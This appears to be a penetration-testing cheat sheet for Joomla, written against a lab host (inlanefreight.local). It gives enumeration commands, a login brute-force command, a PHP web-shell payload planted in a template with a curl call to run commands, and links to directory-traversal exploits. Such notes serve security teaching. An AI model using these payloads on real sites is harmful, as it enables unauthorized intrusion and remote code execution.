Joomla

Introduction

  • CMS used for discussion forums, photo galleries, e-Commerce, user-based communities, and more.

  • Written in PHP and uses MySQL in the backend.


Joomla Discovery/Footprinting

CommandDescription

droopescan scan joomla --url http://dev.inlanefreight.local

Enumeration via droopescan

python2.7 joomlascan.py -u http://dev.inlanefreight.local

Enumeration via joomlascan.py

curl -s http://dev.inlanefreight.local/ | grep Joomla

Check Webpage Source

curl -s http://dev.inlanefreight.local/administrator/manifests/files/joomla.xml | xmllint --format -

Some Joomla versions may be fingerprinted from this file

Browse to http://dev.inlanefreight.local/plugins/system/cache/cache.xml

The cache.xml file can give out an approximate version of Joomla

Browse to http://dev.inlanefreight.local/media/system/js/

Some versions of Joomla can be fingerprinted by analyzing the javascript files in this folder

Browse to http://blog.inlanefreight.local/robots.txt

Check for references to Joomla

Browse to http://dev.inlanefreight.local/README.txt

Check the README file to look for references to Joomla


Joomla Users and Login Bruteforcing

  • Administrator account: The default administrator account is admin, but the password is set at install time

  • You can perform login broteforce by using the following: https://github.com/ajnik/joomla-bruteforce

  • PoC: sudo python3 joomla-brute.py -u http://dev.inlanefreight.local -w /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt -usr admin


Joomla Known Vulnerabilities

  1. PHP TEMPLATE CODE INJECTION TO RCE [Requires Admin Account]

    • The basic idea is to add PHP code inside a template

    • Login as Admin → Navigate to Configuration → Select a Template → Select an existing PHP file → add the following payload:

    • system($_GET['cmd']);

    • curl -s http://dev.inlanefreight.local/templates/protostar/error.php?cmd=id

  2. Joomla 3.9.4 directory traversal CVE-2019-10945

    • Exploit 1: https://www.exploit-db.com/exploits/46710

    • Exploit 2: https://github.com/dpgg101/CVE-2019-10945

Last updated